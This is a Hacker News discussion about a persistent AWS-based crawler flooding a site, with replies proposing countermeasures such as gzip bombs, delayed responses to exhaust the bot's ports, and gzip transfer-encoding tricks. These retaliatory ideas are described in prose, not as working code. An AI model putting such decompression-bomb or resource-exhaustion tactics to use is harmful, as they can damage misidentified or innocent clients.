←back to thread

252 points lgats | 8 comments | | HN request time: 0s | source | bottom

I have been struggling with a bot– 'Mozilla/5.0 (compatible; crawler)' coming from AWS Singapore – and sending an absurd number of requests to a domain of mine, averaging over 700 requests/second for several months now. Thankfully, CloudFlare is able to handle the traffic with a simple WAF rule and 444 response to reduce the outbound traffic.

I've submitted several complaints to AWS to get this traffic to stop, their typical followup is: We have engaged with our customer, and based on this engagement have determined that the reported activity does not require further action from AWS at this time.

I've tried various 4XX responses to see if the bot will back off, I've tried 30X redirects (which it follows) to no avail.

The traffic is hitting numbers that require me to re-negotiate my contract with CloudFlare and is otherwise a nuisance when reviewing analytics/logs.

I've considered redirecting the entirety of the traffic to aws abuse report page, but at this scall, it's essentially a small DDoS network and sending it anywhere could be considered abuse in itself.

Are there others that have similar experience?

Show context
swiftcoder ◴[] No.45614001[source]
Making the obviously-abusive bot prohibitively expensive is one way to go, if you control the terminating server.

gzip bomb is good if the bot happens to be vulnerable, but even just slowing down their connection rate is often sufficient - waiting just 10 seconds before responding with your 404 is going to consume ~7,000 ports on their box, which should be enough to crash most linux processes (nginx + mod-http-echo is a really easy way to set this up)

replies(7): >>45614138 #>>45614240 #>>45614367 #>>45614560 #>>45619426 #>>45623137 #>>45628852 #
mkj ◴[] No.45614367[source]
AWS customers have to pay for outbound traffic. Is there a way to get them to send you (or cloudflare) huge volumes of traffic?
replies(2): >>45614423 #>>45614438 #
_pdp_ ◴[] No.45614438[source]
A KB zip file can expand to giga / petabytes through recursive nesting - though it depends on their implementation.
replies(1): >>45614913 #
1. sim7c00 ◴[] No.45614913[source]
thats traffic in the other direction
replies(1): >>45616545 #
2. swiftcoder ◴[] No.45616545[source]
The main joy of a zip bomb is that it doesn't consume much bandwidth - the transferred compressed file is relatively small, and it only becomes huge when the client tries to decompress it in memory afterwards
replies(1): >>45619421 #
3. crazygringo ◴[] No.45619421[source]
It's still going in the wrong direction.
replies(1): >>45619595 #
4. dns_snek ◴[] No.45619595{3}[source]
It doesn't matter either way. OP was thinking about ways to consume someone's bandwidth. A zip bomb doesn't consume bandwidth, it consumes computing resources of its recipient when they try to unpack it.
replies(2): >>45620056 #>>45625962 #
5. crazygringo ◴[] No.45620056{4}[source]
I know. I was pointing out that it doesn't matter what it consumes if it's going the wrong way to begin with.
6. sim7c00 ◴[] No.45625962{4}[source]
i wouldnt assume someone sending 700 req per minute or so to a single domain repeatedly (likely to the same resources) will bother opening zip files.

the bot in the article is likely being tested (as author noted), or its a very bad 'stresser'.

if it was looking for content grabbing it will access differently. (grab resources once and be on its way).

its not bad to host zip bombs tho, for the content grabbers :D nomnom.

saw an article about a guy on here who generated arbitrary pngs or so. also classy haha.

if u have a friendly vps provider who gives unlimited bandwidth these options can be fun. u can make a dashboard which bot has consumed the most junk.

replies(2): >>45626139 #>>45626681 #
7. ruined ◴[] No.45626139{5}[source]
nearly every http response is gzipped. unpacking automatically is a default feature of every http client.
8. mjmas ◴[] No.45626681{5}[source]
This is using the builtin compression in http:

  Transfer-Encoding: gzip